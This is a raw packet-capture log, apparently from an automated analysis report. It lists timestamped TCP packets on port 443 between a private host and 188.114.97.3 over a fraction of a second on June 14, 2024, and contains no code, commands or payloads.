Jun 14, 2024 15:15:05.891197920 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.891247034 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.891369104 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.891411066 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.891437054 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.891444921 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.891464949 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.891572952 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.891618013 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.891635895 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.891649008 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.891693115 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.891768932 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.891808987 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.891828060 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.891843081 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.891875982 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.930165052 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.930210114 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.930304050 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.930329084 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.930354118 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.974149942 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.985541105 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.985557079 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.985599041 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.985630035 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.985727072 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.985743999 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.985785007 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.987616062 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.987638950 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.987689972 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.987704992 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.987709045 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.987723112 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.987740993 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.987773895 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.987773895 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.987786055 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.987809896 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.987829924 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.987832069 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.987848043 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.987857103 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.987864971 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.987881899 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.987931013 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.987936974 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.987979889 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.988048077 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.988066912 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.988132954 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.988140106 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.988157988 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.988178968 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.988179922 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.988192081 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.988208055 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.988243103 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.988313913 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.988329887 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.988384962 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.988387108 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.988394976 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.988411903 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.988445044 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.988451958 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.988464117 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.988497972 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.988693953 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.988709927 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.988773108 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.988780022 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.988791943 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.988809109 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.988831997 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.988838911 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.988867044 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.988881111 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.988899946 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.988914013 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.988969088 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.988976002 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.989012957 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.989100933 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.989116907 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.989166975 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.989172935 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.989214897 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.989262104 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.989279985 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.989337921 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.989345074 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.989394903 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.989496946 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.989510059 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.989559889 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.989567995 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.989609957 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.989972115 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.989986897 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.990037918 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.990046024 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.990087032 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.990266085 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.990286112 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.990341902 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.990343094 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.990374088 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.990394115 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.990430117 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.990571976 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.990583897 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.990643024 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.990650892 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.990701914 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.991018057 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.991034031 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.991094112 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.991101980 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.991148949 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.991324902 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.991339922 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.991396904 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.991404057 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.991449118 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.991866112 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.991878986 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.991935015 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.991941929 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.991974115 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.992012024 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.992290020 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.992309093 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.992378950 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.992386103 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.992427111 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.992434025 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.992440939 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.992458105 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.992494106 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.992527008 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.992532015 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.992580891 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.992636919 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.992651939 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.992701054 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.992707968 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.992741108 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.992768049 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.993067980 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.993084908 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.993135929 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.993144035 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.993172884 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.993201017 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.993297100 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.993313074 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.993367910 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.993376017 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.993406057 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.993427038 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.993452072 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.993468046 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.993527889 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.993534088 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.993581057 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.993676901 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.993693113 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.993746042 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.993753910 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.993778944 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.993803978 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.994409084 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.994425058 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.994498014 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.994524956 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.994538069 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.994574070 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.995541096 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.995556116 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.995620012 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.995626926 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.995671034 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.995695114 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.995709896 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.995754957 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.995763063 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.995809078 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.995829105 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.995945930 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.995960951 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.996006012 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.996012926 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.996041059 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.996062040 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.996171951 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.996186972 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.996239901 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.996248007 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.996273041 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.996293068 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.996561050 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.996576071 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.996632099 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.996640921 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.996689081 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.996721983 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.996736050 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.996788979 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.996794939 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.996818066 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.996844053 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.998703957 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.998722076 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.998778105 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.998785019 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.998805046 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.998823881 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.999361038 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.999377012 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.999420881 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.999427080 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:05.999458075 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:05.999476910 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.000056028 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.000071049 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.000133991 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.000144005 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.000181913 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.000448942 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.000466108 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.000519037 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.000525951 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.000565052 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.000725031 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.000741005 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.000786066 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.000792980 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.000816107 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.000830889 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.000839949 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.000859022 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.000895023 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.000901937 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.000927925 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.000937939 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.001137972 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.001153946 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.001204014 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.001207113 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.001214981 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.001240015 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.001255989 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.001261950 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.001288891 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.001301050 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.001442909 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.001456022 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.001508951 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.001516104 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.001553059 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.001852036 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.001867056 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.001910925 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.001919031 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.001955032 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.002019882 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.002034903 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.002082109 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.002089977 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.002125025 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.002149105 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.002166033 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.002213955 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.002222061 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.002255917 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.002466917 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.002480984 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.002558947 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.002568007 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.002600908 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.002669096 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.002685070 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.002728939 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.002739906 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.002751112 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.002783060 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.002814054 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.003060102 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.003074884 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.003139973 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.003148079 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.003170967 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.003189087 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.003221989 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.003230095 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.003241062 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.003365040 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.003381014 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.003463984 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.003470898 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.003572941 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.003592014 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.003629923 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.003638983 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.003658056 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.046878099 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.046890974 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.047027111 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.047054052 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.099168062 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.102341890 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.102366924 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.103751898 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.103785992 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.103851080 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.103863955 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.103874922 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.103895903 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.103921890 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.103940964 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.104006052 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.104012966 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.104022980 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.104043007 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.104089975 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.104095936 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.104111910 CEST	49707	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:06.104126930 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.104140043 CEST	443	49707	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:06.104186058 CEST	49707	443	192.168.2.8	188.114.97.3
